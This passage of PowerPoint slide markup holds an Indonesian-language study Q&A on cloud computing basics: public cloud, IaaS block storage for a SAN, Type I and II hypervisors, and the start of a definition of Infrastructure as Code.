              <a:rPr lang="en-ID" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Public cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komputasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>awan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (cloud computing) yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastrukturnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dimiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dioperasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pihak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketiga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> AWS, Microsoft Azure, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Google Cloud) dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diakses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>banyak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> internet.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>📌 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Penjelasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (server, storage, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>banyak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelanggan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (multi-tenant).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Biaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biasanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berdasarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penggunaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (pay-as-you-go).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Cocok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ingin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fleksibilitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tinggi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanpa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengelola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sendiri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>2. What type of cloud solution could be used to implement a SAN?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-ID" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>👉 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Jawaban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-ID" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>IaaS (Infrastructure as a Service)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>spesifik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>cloud-based storage solution</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengimplementasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> SAN (Storage Area Network).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>📌 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Penjelasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>SAN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biasanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyediakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyimpanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tingkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>blok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>performa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tinggi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Di cloud, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> IaaS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menawarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> block storage (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>: Amazon EBS, Azure Disk Storage, Google Persistent Disk) yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berfungsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layaknya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> SAN.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> IaaS, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengonfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> storage, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan server virtual </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesuai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebutuhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>3. What is a Type II hypervisor?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-ID" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>👉 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Jawaban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-ID" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Type II hypervisor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> hypervisor yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berjalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> host, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>langsung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> hardware.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>📌 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Penjelasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Type I hypervisor (bare-metal) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berjalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>langsung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada hardware (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>: VMware </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ESXi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, Microsoft Hyper-V bare metal).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Type II hypervisor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berjalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> OS (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>: VirtualBox, VMware Workstation, Parallels).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Biasanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> desktop/laptop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mudah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diinstal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>performa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rendah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibanding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Type I.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>4. What is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>IaC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-ID" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>👉 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Jawaban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-ID" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>IaC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (Infrastructure as Code) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>praktik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengelola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyediakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> IT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menuliskan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>definisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
